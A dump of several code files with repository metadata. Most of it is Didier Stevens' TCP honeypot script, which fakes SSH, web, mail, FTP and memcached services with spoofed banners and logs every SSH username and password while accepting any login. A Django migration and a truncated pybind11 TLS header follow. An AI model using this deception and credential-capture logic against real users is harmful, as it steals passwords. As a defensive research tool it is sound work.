    print get_domain_ns_hierarchical_dns(domain)  # online mode: start from the default resolver
|
[
"[email protected]"
] | |
523d5763c3761db28717450f17064f87a208f479
|
24df103bec759d7052cbb2c4d7cf3407986d9371
|
/tcp-honeypot.py
|
889eb33c6597ed7ca0c50b22e5b3ce916127cb27
|
[] |
no_license
|
ntung/Beta
|
ef9b3f8036b14bcd481dc0a4662ea1e8a12dee2a
|
3c864fe0c5bd4ed80dac030db6d22b16006754d7
|
refs/heads/master
| 2020-06-11T19:05:36.523562 | 2019-05-31T16:36:16 | 2019-05-31T16:36:16 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 24,438 |
py
|
#!/usr/bin/env python
__description__ = 'TCP honeypot'
__author__ = 'Didier Stevens'
__version__ = '0.0.5'
__date__ = '2019/05/30'
"""
Source code put in public domain by Didier Stevens, no Copyright
https://DidierStevens.com
Use at your own risk
History:
2018/03/08: start
2018/03/09: continue
2018/03/17: continue, added ssl
2018/03/22: 0.0.2 added ssh
2018/08/26: 0.0.3 added randomness when selecting a matching regular expression
2018/09/09: added support for listeners via arguments
2018/12/23: 0.0.4 added THP_SPLIT
2019/03/12: added error handling
2019/04/10: THP_STARTSWITH and THP_ELSE
2019/05/30: 0.0.5 added File2String
Todo:
"""
# Keys of the per-port listener configuration dictionaries (see dListeners
# below and PrintManual for how each key is interpreted).
THP_REFERENCE = 'reference'    # reuse the configuration of another port
THP_SSL = 'ssl'                # dict with THP_CERTFILE/THP_KEYFILE for TLS
THP_CERTFILE = 'certfile'      # path to the certificate file
THP_KEYFILE = 'keyfile'        # path to the private-key file
THP_SSLCONTEXT = 'sslcontext'  # cached ssl context, filled in at startup
THP_SSH = 'ssh'                # dict describing an SSH (paramiko) listener
THP_BANNER = 'banner'          # string sent right after the connection opens
THP_REPLY = 'reply'            # string sent after every read
THP_MATCH = 'match'            # dict of named match rules (regex/startswith)
THP_LOOP = 'loop'              # maximum number of read/reply rounds
THP_REGEX = 'regex'            # regular expression of a match rule
THP_STARTSWITH = 'startswith'  # literal prefix of a match rule
THP_ELSE = 'else'              # fallback rule when no other rule matches
THP_ACTION = 'action'          # optional action of a rule, e.g. THP_DISCONNECT
THP_DISCONNECT = 'disconnect'  # close the connection after the rule fires
THP_SPLIT = 'split'            # separator used to split incoming data
# Terminate With CR LF
def TW_CRLF(data):
    """Join *data* (one string or a list of strings) into a single string in
    which every element is terminated with CR/LF."""
    lines = [data] if isinstance(data, str) else data
    return '\r\n'.join(lines + [''])
# Port -> listener configuration. The THP_* keys are documented above and in
# PrintManual(); THP_REFERENCE entries reuse another port's configuration.
dListeners = {
    # SSH banner only (and a clone on 2222).
    22: {THP_BANNER: TW_CRLF('SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2')},
    2222: {THP_REFERENCE: 22},
    # Interactive SSH honeypot (paramiko) presenting a fake root shell.
    2200: {THP_SSH: {THP_KEYFILE: 'test_rsa.key', THP_BANNER: 'SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2'},
           THP_BANNER: TW_CRLF('Last login: Thu Mar 22 18:10:31 2018 from 192.168.1.1') + 'root@vps:~# ',
           THP_REPLY: '\r\nroot@vps:~# ',
           THP_LOOP: 10
          },
    # HTTPS: static page served over TLS (and a clone on 8443).
    443: {THP_SSL: {THP_CERTFILE: 'cert-20180317-161753.crt', THP_KEYFILE: 'key-20180317-161753.pem'},
          THP_REPLY: TW_CRLF(['HTTP/1.1 200 OK', 'Date: %TIME_GMT_RFC2822%', 'Server: Apache', 'Last-Modified: Wed, 06 Jul 2016 17:51:03 GMT', 'ETag: "59652-cfd-edc33a50bfec6"', 'Accept-Ranges: bytes', 'Content-Length: 285', 'Connection: close', 'Content-Type: text/html; charset=UTF-8', '', '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">', '<link rel="icon" type="image/png" href="favicon.png"/>', '<html>', ' <head>', ' <title>Home</title>', ' <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">', ' </head>', ' <body>Welcome home!</body>', '</html>'])
         },
    8443: {THP_REFERENCE: 443},
    # HTTP: same static page, plain TCP (clones on 591, 8008, 8080).
    80: {THP_REPLY: TW_CRLF(['HTTP/1.1 200 OK', 'Date: %TIME_GMT_RFC2822%', 'Server: Apache', 'Last-Modified: Wed, 06 Jul 2016 17:51:03 GMT', 'ETag: "59652-cfd-edc33a50bfec6"', 'Accept-Ranges: bytes', 'Content-Length: 285', 'Connection: close', 'Content-Type: text/html; charset=UTF-8', '', '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">', '<link rel="icon" type="image/png" href="favicon.png"/>', '<html>', ' <head>', ' <title>Home</title>', ' <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">', ' </head>', ' <body>Welcome home!</body>', '</html>'])},
    591: {THP_REFERENCE: 80},
    8008: {THP_REFERENCE: 80},
    8080: {THP_REFERENCE: 80},
    # SMTP: banner plus EHLO handling and a catch-all syntax error.
    25: {THP_LOOP: 10,
         THP_BANNER: TW_CRLF('220 HP1EUR02TC012.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at %TIME_GMT_RFC2822%'),
         THP_MATCH: {
                     'EHLO': {THP_REGEX: '^[Ee][Hh][Ll][Oo]', THP_REPLY: TW_CRLF(['250-HP1EUR02TC012.mail.protection.outlook.com', '250-PIPELINING', '250-SIZE 20971520', '250-ETRN', '250-ENHANCEDSTATUSCODES', '250 8BITMIME'])},
                     'default': {THP_REGEX: '^.', THP_REPLY: TW_CRLF('500 5.5.2 Error: bad syntax')},
                    }
        },
    # memcached: answers stats/version/get/set, disconnects on quit.
    11211: {THP_LOOP: 10,
            THP_MATCH: {
                        'stats': {THP_REGEX: '^stats', THP_REPLY: TW_CRLF(['STAT pid 14868', 'STAT uptime 175931', 'STAT time %TIME_GMT_EPOCH%', 'STAT version 1.5.4', 'STAT id C3B806AA71F0887773210E75DD12BDAD', 'STAT pointer_size 32', 'STAT rusage_user 620.299700', 'STAT rusage_system 1545.703017', 'STAT curr_items 228', 'STAT total_items 779', 'STAT bytes 15525', 'STAT curr_connections 92', 'STAT total_connections 1740', 'STAT connection_structures 165', 'STAT cmd_get 7411', 'STAT cmd_set 28445156', 'STAT get_hits 5183', 'STAT get_misses 2228', 'STAT evictions 0', 'STAT bytes_read 2112768087', 'STAT bytes_written 1000038245', 'STAT limit_maxbytes 52428800', 'STAT threads 1', 'END'])},
                        'version': {THP_REGEX: '^version', THP_REPLY: TW_CRLF('VERSION 1.5.4')},
                        'get': {THP_REGEX: '^get ', THP_REPLY: TW_CRLF(['VALUE a 0 2', 'AA', 'END'])},
                        'set': {THP_REGEX: '^set ', THP_REPLY: TW_CRLF('STORED')},
                        'quit': {THP_REGEX: '^quit', THP_ACTION: THP_DISCONNECT},
                       }
           },
    # FTP: fake login sequence, always "succeeds".
    21: {THP_LOOP: 10,
         THP_BANNER: TW_CRLF('220 FTP server ready. All transfers are logged. (FTP) [no EPSV]'),
         THP_MATCH: {
                     'user': {THP_REGEX: '^USER ', THP_REPLY: TW_CRLF('331 Please specify the password.')},
                     'pass': {THP_REGEX: '^PASS ', THP_REPLY: TW_CRLF('230 Login successful.')},
                     'typea': {THP_REGEX: '^TYPE A', THP_REPLY: TW_CRLF('200 Switching to ASCII mode.')},
                     'auth': {THP_REGEX: '^AUTH', THP_REPLY: TW_CRLF('530 Please login with USER and PASS.')},
                     'pasv': {THP_REGEX: '^PASV', THP_REPLY: TW_CRLF('227 Entering Passive Mode (121)')},
                     'help': {THP_REGEX: '^HELP', THP_REPLY: TW_CRLF(['220 FTP server ready. All transfers are logged. (FTP) [no EPSV]', '530 Please login with USER and PASS.'])},
                    }
        },
    # Bare listener: accept, read once, close.
    121: {},
}
import optparse
import socket
import select
import threading
import time
import re
import ssl
import textwrap
import sys
import random
import traceback
import binascii
import struct
try:
import paramiko
except:
pass
def PrintManual():
    """Print the built-in manual, wrapped to 79 columns."""
    manual = r'''
Manual:

TCP listeners are configured with Python dictionary dListeners. The key is the port number (integer) and the value is another dictionary (listener dictionary).

When this listener dictionary is empty, the honeypot will accept TCP connections on the configured port, perform a single read and then close the connection.

The listener can be configured to perform more than one read: add key THP_LOOP to the dictionary with an integer as value. The integer specifies the maximum number of reads.

A banner can be transmitted before the first read, this is done by adding key THP_BANNER to the dictionary with a string as the value (the banner).

The listener can be configured to send a reply after each read, this is done by adding key THP_REPLY to the dictionary with a string as the value (the reply).

To increase the interactivity of the honeypot, keywords can be defined with replies. This is done by adding a new dictionary to the dictionary with key THP_MATCH.
Entries in this match dictionary are regular expressions (THP_REGEX): when a regular expression matches read data, the corresponding reply is send or action performed (e.g. disconnect).
If more than one regular expression matches, then the longest matching is selected. If there is more than one longest match (e.g. equal length), then one is selected at random.

A listener can be configured to accept SSL/TLS connections by adding key THP_SSL to the listener dictionary with a dictionary as value specifying the certificate (THP_CERTFILE) and key (THP_KEYFILE) to use. If an SSL context can not be created (for example because of missing certificate file), the listener will fallback to TCP.

A listener can be configured to accept SSH connections by adding key THP_SSH to the listener dictionary with a dictionary as value specifying the key (THP_KEYFILE) to use. This requires Python module paramiko, the listener will fallback to TCP if this module is missing.

When several ports need to behave the same, the dictionary can just contain a reference (THP_REFERENCE) to the port which contains the detailed description.

Helper function TW_CRLF (Terminate With CR/LF) can be used to format replies and banners.

Replies and banners can contain aliases: %TIME_GMT_RFC2822% and %TIME_GMT_EPOCH%, they will be instantiated when a reply is transmitted.

Output is written to stdout and a log file.

This tool has several command-line options, and can take listeners as arguments. These arguments are filenames of Python programs that define listeners.

It is written for Python 2.7 and was tested on Windows 10, Ubuntu 16 and CentOS 6.
'''
    for line in manual.split('\n'):
        print(textwrap.fill(line, 79))
# Convert 2 Bytes If Python 3
def C2BIP3(string):
    """Return *string* unchanged on Python 2; on Python 3 encode it to bytes,
    one byte per character ordinal."""
    if sys.version_info[0] <= 2:
        return string
    return bytes([ord(character) for character in string])
# Convert 2 Integer If Python 2
def C2IIP2(data):
    """On Python 2 *data* is a one-character str: return its ordinal.
    On Python 3 it is already an int and is returned unchanged."""
    return data if sys.version_info[0] > 2 else ord(data)
# CIC: Call If Callable
def CIC(expression):
    """Return expression() when *expression* is callable, otherwise return
    *expression* itself (lazy-evaluation helper)."""
    return expression() if callable(expression) else expression
# IFF: IF Function
def IFF(expression, valueTrue, valueFalse):
    """Functional if: pick valueTrue when *expression* is truthy, valueFalse
    otherwise; a callable branch is invoked lazily (CIC semantics inlined)."""
    chosen = valueTrue if expression else valueFalse
    return chosen() if callable(chosen) else chosen
def File2String(filename):
    """Return the binary content of *filename*, or None when the file cannot
    be opened or read.

    Replaces the original open/bare-except/finally bookkeeping: 'with'
    guarantees the handle is closed even when read() fails, and only I/O
    errors are swallowed instead of every exception.
    """
    try:
        with open(filename, 'rb') as f:
            return f.read()
    except (IOError, OSError):
        # Same contract as before: any I/O failure yields None.
        return None
def FormatTime(epoch=None):
    """Format *epoch* (seconds since the epoch; default: now) as
    YYYYMMDD-HHMMSS in local time."""
    when = time.time() if epoch is None else epoch
    fields = time.localtime(when)[0:6]
    return '%04d%02d%02d-%02d%02d%02d' % fields
class cOutput():
    """Log-line writer: prints to stdout, to a file, or to both.

    With a filename, lines go to the file; stdout is used as well only when
    bothoutputs is True. Without a filename, lines go to stdout only.
    File errors are deliberately swallowed so logging never kills the server.
    """

    def __init__(self, filename=None, bothoutputs=False):
        self.filename = filename
        self.bothoutputs = bothoutputs
        self.f = None
        if filename:
            self.f = open(filename, 'w')

    def Line(self, line):
        """Write one line (a newline is appended for the file)."""
        if self.f is None or self.bothoutputs:
            print(line)
        if self.f is not None:
            try:
                self.f.write(line + '\n')
                self.f.flush()
            except:
                # Best effort: never let a logging failure propagate.
                pass

    def LineTimestamped(self, line):
        """Write one line prefixed with the current timestamp."""
        self.Line('%s: %s' % (FormatTime(), line))

    def Exception(self):
        """Log the current exception's traceback to the active outputs."""
        self.LineTimestamped('Exception occured:')
        if not self.f or self.bothoutputs:
            traceback.print_exc()
        if self.f:
            try:
                traceback.print_exc(file=self.f)
                self.f.flush()
            except:
                pass

    def Close(self):
        """Close the log file (if any); further lines go to stdout only."""
        if self.f:
            self.f.close()
            self.f = None
def ReplaceAliases(data):
    """Instantiate the %TIME_GMT_RFC2822% and %TIME_GMT_EPOCH% aliases in
    *data* with the current GMT time and return the result."""
    substitutions = [
        ('%TIME_GMT_RFC2822%', time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime())),
        ('%TIME_GMT_EPOCH%', str(int(time.time()))),
    ]
    for alias, value in substitutions:
        data = data.replace(alias, value)
    return data
def ParseNumber(number):
    """Parse *number* as a decimal integer, or as hexadecimal when it carries
    a 0x prefix."""
    if number.startswith('0x'):
        return int(number, 16)
    return int(number)
def MyRange(begin, end):
    """Inclusive range from begin to end that also counts downward when
    begin > end; begin == end yields the single-element list [begin]."""
    if begin == end:
        return [begin]
    step = 1 if begin < end else -1
    return range(begin, end + step, step)
def ParsePorts(expression):
    """Expand a comma-separated list of ports and inclusive ranges ('a-b',
    decimal or 0x-hex per ParseNumber) into a flat list of port numbers."""
    def expand(token):
        # A lone number yields itself; 'a-b' yields the inclusive span.
        bounds = token.split('-')
        if len(bounds) == 1:
            return [ParseNumber(bounds[0])]
        return list(MyRange(ParseNumber(bounds[0]), ParseNumber(bounds[1])))

    ports = []
    for token in expression.split(','):
        ports.extend(expand(token))
    return ports
def ModuleLoaded(name):
    """Return True when module *name* has already been imported (i.e. is
    present in sys.modules)."""
    return name in sys.modules
# paramiko is an optional dependency (see the guarded import above); only
# define the SSH server glue when it is available.
if ModuleLoaded('paramiko'):
    class cSSHServer(paramiko.ServerInterface):
        """Minimal paramiko server: logs credentials and accepts any password."""
        def __init__(self, oOutput, connectionID):
            self.oEvent = threading.Event()  # set once the client requests a shell
            self.oOutput = oOutput           # shared log writer
            self.connectionID = connectionID # log prefix identifying the connection
        def check_channel_request(self, kind, chanid):
            # Only interactive sessions are accepted.
            if kind == 'session':
                return paramiko.OPEN_SUCCEEDED
            return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
        def check_auth_password(self, username, password):
            # Honeypot behavior: record the credentials, then accept them.
            self.oOutput.LineTimestamped('%s SSH username: %s' % (self.connectionID, username))
            self.oOutput.LineTimestamped('%s SSH password: %s' % (self.connectionID, password))
            return paramiko.AUTH_SUCCESSFUL
        def get_allowed_auths(self, username):
            # Advertise password auth only.
            return 'password'
        def check_channel_shell_request(self, channel):
            self.oEvent.set()
            return True
        def check_channel_pty_request(self, channel, term, width, height, pixelwidth, pixelheight, modes):
            # Accept any PTY request without applying its parameters.
            return True
def SplitIfRequested(dListener, data):
    """Split *data* on the listener's THP_SPLIT separator, dropping empty
    parts; when no separator is configured, return [data] unchanged."""
    if THP_SPLIT not in dListener:
        return [data]
    separator = dListener[THP_SPLIT]
    return [part for part in data.split(separator) if part != '']
class ConnectionThread(threading.Thread):
    """Handle one accepted connection on a dedicated thread.

    Wraps the raw socket in SSL or SSH when the listener configuration asks
    for it, sends the optional banner, then performs up to THP_LOOP
    read/reply rounds driven by the listener's THP_REPLY / THP_MATCH rules.
    """
    global dListeners  # NOTE(review): a global statement at class scope is a no-op; dListeners is resolved via module scope anyway

    def __init__(self, oSocket, oOutput, options):
        threading.Thread.__init__(self)
        self.oSocket = oSocket       # listening socket with a pending connection
        self.oOutput = oOutput       # shared log writer
        self.options = options       # parsed command-line options
        self.connection = None       # the (possibly SSL/SSH-wrapped) connection
        self.connectionID = None     # "localip:port-remoteip:port" log prefix

    def run(self):
        """Accept one connection and run the configured honeypot dialogue."""
        oSocketConnection, address = self.oSocket.accept()
        self.connectionID = '%s:%d-%s:%d' % (self.oSocket.getsockname() + address)
        oSocketConnection.settimeout(self.options.timeout)
        self.oOutput.LineTimestamped('%s connection' % self.connectionID)
        dListener = dListeners[self.oSocket.getsockname()[1]]
        if THP_REFERENCE in dListener:
            # This port reuses another port's configuration.
            dListener = dListeners[dListener[THP_REFERENCE]]
        try:
            oSSLConnection = None
            oSSLContext = dListener.get(THP_SSLCONTEXT, None)
            oSSHConnection = None
            oSSHFile = None
            if oSSLContext != None:
                # TLS listener: wrap the TCP connection in the prepared context.
                oSSLConnection = oSSLContext.wrap_socket(oSocketConnection, server_side=True)
                self.connection = oSSLConnection
            elif dListener.get(THP_SSH, None) != None:
                if ModuleLoaded('paramiko'):
                    if THP_KEYFILE in dListener[THP_SSH]:
                        oRSAKey = paramiko.RSAKey(filename=dListener[THP_SSH][THP_KEYFILE])
                    else:
                        # No key configured: generate a throwaway host key.
                        oRSAKey = paramiko.RSAKey.generate(1024)
                        self.oOutput.LineTimestamped('%s SSH generated RSA key' % self.connectionID)
                    oTransport = paramiko.Transport(oSocketConnection)
                    if THP_BANNER in dListener[THP_SSH]:
                        oTransport.local_version = dListener[THP_SSH][THP_BANNER]
                    oTransport.load_server_moduli()
                    oTransport.add_server_key(oRSAKey)
                    oSSHServer = cSSHServer(self.oOutput, self.connectionID)
                    try:
                        oTransport.start_server(server=oSSHServer)
                    except paramiko.SSHException:
                        self.oOutput.LineTimestamped('%s SSH negotiation failed' % self.connectionID)
                        raise
                    self.oOutput.LineTimestamped('%s SSH banner %s' % (self.connectionID, oTransport.remote_version))
                    oSSHConnection = oTransport.accept(20)
                    if oSSHConnection is None:
                        self.oOutput.LineTimestamped('%s SSH no channel' % self.connectionID)
                        # NOTE(review): bare raise without an active exception
                        # raises RuntimeError; handled by the generic except below.
                        raise
                    self.oOutput.LineTimestamped('%s SSH authenticated' % self.connectionID)
                    oSSHServer.oEvent.wait(10)
                    if not oSSHServer.oEvent.is_set():
                        self.oOutput.LineTimestamped('%s SSH no shell' % self.connectionID)
                        raise
                    self.connection = oSSHConnection
                    oSSHFile = oSSHConnection.makefile('rU')
                else:
                    # Fall back to plain TCP when paramiko is unavailable.
                    self.oOutput.LineTimestamped('%s can not create SSH server, Python module paramiko missing' % self.connectionID)
                    self.connection = oSocketConnection
            else:
                self.connection = oSocketConnection
            if THP_BANNER in dListener:
                self.connection.send(ReplaceAliases(dListener[THP_BANNER]))
                self.oOutput.LineTimestamped('%s send banner' % self.connectionID)
            # Up to THP_LOOP read/reply rounds (default: a single read).
            for i in range(0, dListener.get(THP_LOOP, 1)):
                if oSSHFile == None:
                    data = self.connection.recv(self.options.readbuffer)
                else:
                    data = oSSHFile.readline()
                self.oOutput.LineTimestamped('%s data %s' % (self.connectionID, repr(data)))
                for splitdata in SplitIfRequested(dListener, data):
                    if splitdata != data:
                        self.oOutput.LineTimestamped('%s splitdata %s' % (self.connectionID, repr(splitdata)))
                    if THP_REPLY in dListener:
                        self.connection.send(ReplaceAliases(dListener[THP_REPLY]))
                        self.oOutput.LineTimestamped('%s send reply' % self.connectionID)
                    if THP_MATCH in dListener:
                        # Count which rule keys are in use; THP_REGEX and
                        # THP_STARTSWITH rule sets are mutually exclusive.
                        dKeys = {}
                        for item in dListener[THP_MATCH].items():
                            for key in item[1].keys():
                                dKeys[key] = 1 + dKeys.get(key, 0)
                        if THP_REGEX in dKeys and THP_STARTSWITH in dKeys:
                            self.oOutput.LineTimestamped('THP_MATCH cannot contain both THP_REGEX and THP_STARTSWITH!')
                        elif THP_REGEX in dKeys:
                            matches = []
                            for matchname, dMatch in dListener[THP_MATCH].items():
                                if THP_REGEX in dMatch:
                                    oMatch = re.search(dMatch[THP_REGEX], splitdata)
                                    if oMatch != None:
                                        matches.append([len(oMatch.group()), dMatch, matchname])
                            if self.ProcessMatches(matches, dListener):
                                # Disconnect requested: stop processing splits.
                                break
                        elif THP_STARTSWITH in dKeys:
                            matches = []
                            for matchname, dMatch in dListener[THP_MATCH].items():
                                if THP_STARTSWITH in dMatch and splitdata.startswith(dMatch[THP_STARTSWITH]):
                                    matches.append([len(dMatch[THP_STARTSWITH]), dMatch, matchname])
                            if self.ProcessMatches(matches, dListener):
                                break
            #a# is it necessary to close both oSSLConnection and oSocketConnection?
            if oSSLConnection != None:
                oSSLConnection.shutdown(socket.SHUT_RDWR)
                oSSLConnection.close()
            oSocketConnection.shutdown(socket.SHUT_RDWR)
            oSocketConnection.close()
            self.oOutput.LineTimestamped('%s closed' % self.connectionID)
        except socket.timeout:
            self.oOutput.LineTimestamped('%s timeout' % self.connectionID)
        except Exception as e:
            # Log and swallow so one bad connection never kills the honeypot.
            self.oOutput.LineTimestamped("%s exception '%s'" % (self.connectionID, str(e)))

    def ProcessMatches(self, matches, dListener):
        """Send the reply of the best-matching rule (falling back to THP_ELSE)
        and return True when the rule asks for a disconnect.

        matches: list of [matchlength, ruledict, rulename].
        """
        result = False
        if matches == []:
            # Nothing matched: fall back to the THP_ELSE entry, if present.
            for matchname, dMatch in dListener[THP_MATCH].items():
                if THP_ELSE in dMatch:
                    matches.append([0, dMatch, THP_ELSE])
        if matches != []:
            # Prefer the longest match; ties are broken at random.
            # NOTE(review): on equal lengths sorted() compares the dict
            # elements too, which raises TypeError on Python 3 -- confirm
            # this code is only ever run under Python 2.
            matches = sorted(matches, reverse=True)
            longestmatches = [match for match in matches if match[0] == matches[0][0]]
            longestmatch = random.choice(longestmatches)
            dMatchLongest = longestmatch[1]
            if THP_REPLY in dMatchLongest:
                self.connection.send(ReplaceAliases(dMatchLongest[THP_REPLY]))
                self.oOutput.LineTimestamped('%s send %s reply' % (self.connectionID, longestmatch[2]))
            if dMatchLongest.get(THP_ACTION, '') == THP_DISCONNECT:
                self.oOutput.LineTimestamped('%s disconnecting' % self.connectionID)
                result = True
        return result
def TCPHoneypot(filenames, options):
    """Set up all configured listeners and serve connections forever.

    filenames: extra Python files that may (re)define dListeners; they are
    executed in this module's globals. options: parsed command-line options.
    """
    global dListeners
    oOutput = cOutput('tcp-honeypot-%s.log' % FormatTime(), True)
    for filename in filenames:
        oOutput.LineTimestamped('Exec: %s' % filename)
        # NOTE(review): executes arbitrary code from the given file; execfile
        # is Python 2 only.
        execfile(filename, globals())
    if ModuleLoaded('paramiko'):
        paramiko.util.log_to_file('tcp-honeypot-ssh-%s.log' % FormatTime())
    if options.ports != '':
        # -P replaces the configured listeners with bare (read-once) ones.
        oOutput.LineTimestamped('Ports specified via command-line option: %s' % options.ports)
        dListeners = {}
        for port in ParsePorts(options.ports):
            dListeners[port] = {}
    if options.extraports != '':
        # -p adds bare listeners on top of the configured ones.
        oOutput.LineTimestamped('Extra ports: %s' % options.extraports)
        for port in ParsePorts(options.extraports):
            dListeners[port] = {}
    sockets = []
    for port in dListeners.keys():
        if THP_SSL in dListeners[port]:
            # Build the SSL context up front; on failure the listener falls
            # back to plain TCP (THP_SSLCONTEXT is simply not set).
            context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
            try:
                context.load_cert_chain(certfile=dListeners[port][THP_SSL][THP_CERTFILE], keyfile=dListeners[port][THP_SSL][THP_KEYFILE])
                dListeners[port][THP_SSLCONTEXT] = context
                oOutput.LineTimestamped('Created SSL context for %d' % port)
            except IOError as e:
                if '[Errno 2]' in str(e):
                    oOutput.LineTimestamped('Error reading certificate and/or key file: %s %s' % (dListeners[port][THP_SSL][THP_CERTFILE], dListeners[port][THP_SSL][THP_KEYFILE]))
                else:
                    oOutput.LineTimestamped('Error creating SSL context: %s' % e)
                oOutput.LineTimestamped('SSL not enabled for %d' % port)
        oSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        oSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        try:
            oSocket.bind((options.address, port))
        except socket.error as e:
            # Known, non-fatal bind failures are reported and the port skipped;
            # anything else is fatal.
            if '[Errno 98] Address already in use' in str(e):
                oOutput.LineTimestamped('Port %d can not be used, it is already open' % port)
                continue
            elif '[Errno 99] Cannot assign requested address' in str(e) or '[Errno 10049] The requested address is not valid in its context' in str(e):
                oOutput.LineTimestamped('Address %s can not be used (port %d)' % (options.address, port))
                continue
            elif '[Errno 10013] An attempt was made to access a socket in a way forbidden by its access permissions' in str(e):
                oOutput.LineTimestamped('Port %d can not be used, access is forbidden' % port)
                continue
            else:
                raise e
        oSocket.listen(5)
        oOutput.LineTimestamped('Listening on %s %d' % oSocket.getsockname())
        sockets.append(oSocket)
    if sockets == []:
        return
    while True:
        # Wait for any listening socket to become readable, then hand each
        # pending connection to a dedicated thread.
        readables, writables, exceptionals = select.select(sockets, [], [])
        for oSocket in readables:
            try:
                ConnectionThread(oSocket, oOutput, options).start()
            except:
                oOutput.Exception()
def Main():
    """Parse the command line; print the manual with -m, otherwise start the
    honeypot with any listener files given as arguments."""
    moredesc = '''
Source code put in the public domain by Didier Stevens, no Copyright
Use at your own risk
https://DidierStevens.com'''

    parser = optparse.OptionParser(usage='usage: %prog [options]\n' + __description__ + moredesc, version='%prog ' + __version__)
    parser.add_option('-m', '--man', action='store_true', default=False, help='Print manual')
    parser.add_option('-t', '--timeout', type=int, default=10, help='Timeout value for sockets in seconds (default 10s)')
    parser.add_option('-r', '--readbuffer', type=int, default=10240, help='Size read buffer in bytes (default 10240)')
    parser.add_option('-a', '--address', default='0.0.0.0', help='Address to listen on (default 0.0.0.0)')
    parser.add_option('-P', '--ports', default='', help='Ports to listen on (overrides ports configured in the program)')
    parser.add_option('-p', '--extraports', default='', help='Extra ports to listen on (default none)')
    options, arguments = parser.parse_args()

    if options.man:
        parser.print_help()
        PrintManual()
        return

    TCPHoneypot(arguments, options)
# Script entry point.
if __name__ == '__main__':
    Main()
|
[
"[email protected]"
] | |
613442e4334b7b1c405168b18116068806fdff41
|
c86cb4e5e036a4a591acb8683c9e7023b657fdfe
|
/breathecode/admissions/migrations/0006_auto_20200703_1951.py
|
a4d6b94f4dc09df601bd0054def34615ce51c921
|
[] |
no_license
|
Joshfishman97/apiv2
|
0fe6c01cb63fafcbaf772ea2fee4b549694d3abf
|
aee21638748caf7abbd7543bcde95ef74e0bbb7c
|
refs/heads/master
| 2023-08-29T09:21:51.635903 | 2021-10-11T19:52:40 | 2021-10-11T19:52:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 518 |
py
|
# Generated by Django 3.0.7 on 2020-07-03 19:51
from django.db import migrations, models
class Migration(migrations.Migration):
    """Drop Cohort.online_room_url and make Cohort.ending_date optional."""

    dependencies = [
        ('admissions', '0005_auto_20200703_1752'),
    ]

    operations = [
        # The online room URL is no longer stored on the cohort.
        migrations.RemoveField(
            model_name='cohort',
            name='online_room_url',
        ),
        # Allow cohorts without a fixed end date.
        migrations.AlterField(
            model_name='cohort',
            name='ending_date',
            field=models.DateTimeField(blank=True, null=True),
        ),
    ]
|
[
"[email protected]"
] | |
38429a573b65366bc1e423cace706d35a5c44f7e
|
b806f99e96dc6782e5983fa1e3e0df5957cee122
|
/src/asiopal/TLSConfig.h
|
90550300caabce45b51257e55711e58b8b01cfcd
|
[
"Apache-2.0"
] |
permissive
|
garretfick/pydnp3
|
db1b29e7b1416a102abceaa322a3f9da1336fa55
|
54f7e791bf86a5122e8b734e9d8d64882796cadc
|
refs/heads/master
| 2023-04-06T08:33:59.335065 | 2019-11-30T02:08:45 | 2019-11-30T02:08:45 | 174,612,654 | 4 | 1 |
Apache-2.0
| 2023-03-27T09:39:27 | 2019-03-08T21:31:10 |
Python
|
UTF-8
|
Python
| false | false | 4,996 |
h
|
/*
* -*- coding: utf-8 -*- {{{
* vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
*
* Copyright 2018, Kisensum.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* Neither Kisensum, nor any of its employees, nor any jurisdiction or
* organization that has cooperated in the development of these materials,
* makes any warranty, express or implied, or assumes any legal liability
* or responsibility for the accuracy, completeness, or usefulness or any
* information, apparatus, product, software, or process disclosed, or
* represents that its use would not infringe privately owned rights.
* Reference herein to any specific commercial product, process, or service
* by trade name, trademark, manufacturer, or otherwise does not necessarily
* constitute or imply its endorsement, recommendation, or favoring by Kisensum.
* }}}
*/
#ifndef PYDNP3_ASIOPAL_TLSCONFIG_H
#define PYDNP3_ASIOPAL_TLSCONFIG_H
#include <pybind11/pybind11.h>
#include <Python.h>
#include <asiopal/TLSConfig.h>
#ifdef PYDNP3_ASIOPAL
namespace py = pybind11;
using namespace std;
// Bind asiopal::TLSConfig to Python as "TLSConfig".
//
// NOTE(review): the constructor docstring below advertises allowTLSv12 as
// "default true", but py::arg("allowTLSv12") defaults to false -- confirm
// against the asiopal::TLSConfig C++ constructor and align one of the two.
void bind_TLSConfig(py::module &m)
{
    // ----- struct: asiopal:::TLSConfig -----
    py::class_<asiopal::TLSConfig>(m, "TLSConfig",
        "TLS configuration information.")

        .def(
            // Keyword-argument constructor mirroring the C++ signature.
            py::init<const std::string&, const std::string&, const std::string&, int, bool, bool, bool, const std::string&>(),
            " Construct a TLS configuration. \n"
            ":param peerCertFilePath: Certificate file used to verify the peer or server. Can be CA file or a "
            "self-signed cert provided by other party. \n"
            ":param localCertFilePath: File that contains the certificate (or certificate chain) that will be "
            "presented to the remote side of the connection \n"
            ":param privateKeyFilePath: File that contains the private key corresponding to the local certificate \n"
            ":param maxVerifyDepth: The maximum certificate chain verification depth (0 == self-signed only) \n"
            ":param allowTLSv10: Allow TLS version 1.0 (default false) \n"
            ":param allowTLSv11: Allow TLS version 1.1 (default false) \n"
            ":param allowTLSv12: Allow TLS version 1.2 (default true) \n"
